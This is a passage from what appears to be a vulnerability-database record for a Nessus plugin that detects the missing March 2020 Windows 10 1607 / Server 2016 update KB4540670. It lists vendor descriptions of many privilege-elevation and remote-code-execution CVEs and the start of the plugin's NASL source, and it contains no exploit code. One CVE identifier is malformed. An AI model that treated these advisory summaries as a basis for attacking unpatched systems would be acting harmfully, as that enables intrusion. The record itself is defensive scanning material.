(CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. 
(CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. 
By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise a user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791, CVE-2020-0898)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - A denial of service vulnerability exists when the Windows Tile Object Service improperly handles hard links. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0786)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles file operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. 
(CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831, CVE-2020-0848)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540670: Windows 10 Version 1607 and Windows Server 2016 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0776", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0786", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0798", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0814", "CVE-2020-0816", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", 
"CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897", "CVE-2020-0898"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4540670.NASL", "href": "https://www.tenable.com/plugins/nessus/134369", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134369);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0776\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0786\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0798\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0814\",\n \"CVE-2020-0816\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0848\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n 
\"CVE-2020-0896\",\n \"CVE-2020-0897\",\n \"CVE-2020-0898\"\n );\n script_xref(name:\"MSKB\", value:\"4540670\");\n script_xref(name:\"MSFT\", value:\"MS20-4540670\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540670: Windows 10 Version 1607 and Windows Server 2016 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540670.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. 
(CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. 
(CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. 
An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector allows file creation in arbitrary\n locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0801,\n CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849,\n CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. 
An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. 
An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An attacker who had already\n gained execution on the victim system could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how Media Foundation handles objects in\n memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. 
An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791, CVE-2020-0898)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - A denial of service vulnerability exists when the\n Windows Tile Object Service improperly handles hard\n links. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. 
(CVE-2020-0786)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles file\n operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. 
The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-0867,\n CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists when \n Microsoft Edge improperly accesses objects in memory. \n The vulnerability could corrupt memory in such a way \n that enables an attacker to execute arbitrary code in \n the context of the current user. 
An attacker who \n successfully exploited the vulnerability could gain \n the same user rights as the current user. If the current \n user is logged on with administrative user rights, an \n attacker could take control of an affected system. An \n attacker could then install programs; view, change, or \n delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. 
(CVE-2020-08323,\n CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829,\n CVE-2020-0831, CVE-2020-0848)\");\n # https://support.microsoft.com/en-us/help/4540670/windows-10-update-kb4540670\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f4230aa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4540670.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0690\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
